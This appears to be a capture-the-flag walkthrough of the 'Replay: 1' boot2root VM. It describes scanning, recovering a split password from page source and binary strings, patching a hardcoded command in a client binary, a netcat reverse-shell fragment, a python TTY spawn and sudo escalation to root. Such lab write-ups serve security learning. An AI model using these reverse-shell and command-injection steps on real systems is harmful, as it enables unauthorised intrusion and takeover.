Hello friends! Today we are going to take
another boot2root challenge known as “Replay: 1”. The credit for making this VM
machine goes to “c0rruptedb1t” and it is another boot2root challenge in which
our goal is to get root access to complete the challenge. You can download this
VM here.
Level: Intermediate
Flags: There is one flag (flag.txt).
· IP Discovery using netdiscover
· Network scanning (Nmap)
· Surfing HTTPS service port (80)
· Enumerating password from Source code.
· Enumerating robots.txt and finding zip file
· Unzipping zip file
· Enumerating password from binary file
· Enumerating the hard coded command
· Editing the hardcoded command
· Getting a reverse shell
· Enumerating password for user
· Elevate Privileges to get root
· Getting Flag
· IP Discovery using netdiscover
· Network scanning (Nmap)
· Surfing HTTPS service port (80)
· Enumerating password from Source code.
· Enumerating robots.txt and finding zip file
· Unzipping zip file
· Enumerating password from binary file
· Enumerating the hard coded command
· Editing the hardcoded command
· Getting a reverse shell
· Enumerating password for user
· Elevate Privileges to get root
· Getting Flag
Let’s start off with scanning the network
to find our target.
We found our target –>
Our next step is to scan our target with
-p- -A
The NMAP output shows us that there are 3
ports open: 22(SSH), 80(HTTP), 1337(Unknown)
We find that port 80 is running http, so we
open the IP in our browser.
We take a look at the source code of web
page and at the top of the source code we find a string inside a comment. We
are not able to do anything with it, so we save it for later.
As nmap scan shows us that there is one
entry inside robots.txt. We open robots.txt and find an entry called
We open the link and download the zip file
from the web server. After downloading the file, we extract it and find 64-bit
ELF file and a text file. We take a look at the content of the text file and
don’t find anything of use.
When we run the application “client.bin”, it
asks for an IP address and a password.
As we have no clue for the password, we
check the strings inside the application and there we find a hint for the password.
Inside the application we find the second half of the password. Now earlier
inside the web page, we found a strange string that might be the first half of
the password.
We joined the string and use it as password
for the application. After giving the password, we successfully able to login,
and find that we can run commands. But when we type a command we get an error
stating that we are sending unauthorized packets and the connection gets
Now when we take a closer look at the
application we find that the command “;whoami” is hardcoded in the application.
We try to edit the application and change
“;whoami” command to something else and find that the size of string inside the
application should remain the same and the command should always start with a
semi-colon. So we changed the “;whoami” to “;uname -a” keeping the number of
characters inside the application the same by replacing existing characters
inside the application.
Now when we run the application and give
the password we are successfully able to execute our command.
Now we replace the entire string with our
netcat reverse shell one liner and used extra characters to keep the size of
the application the same.
-e /bin/bash 4444;ls;ls;ls;ls;ls;ls;ls;
Now we run the application and give the
correct the password.
We setup our listener and are successfully
able to get a reverse shell. After getting a reverse shell we spawn a TTY shell
using python.
-lvp 4444
-c ‘import pty;pty.spawn(“/bin/bash”)’
Enumerating through the directories inside
“~/Documents/.ftp” we find a file called “users.passwd”. We open it and find
the password for user “bob”. Now we check the sudoers list and find that we can
run all commands as root user.
As we have the password for user bob, we
spawn a shell as root user. We go to “/” directory and find a file called
“flag.txt”. We take a look at the content of the file and find the
congratulatory flag.
cd /
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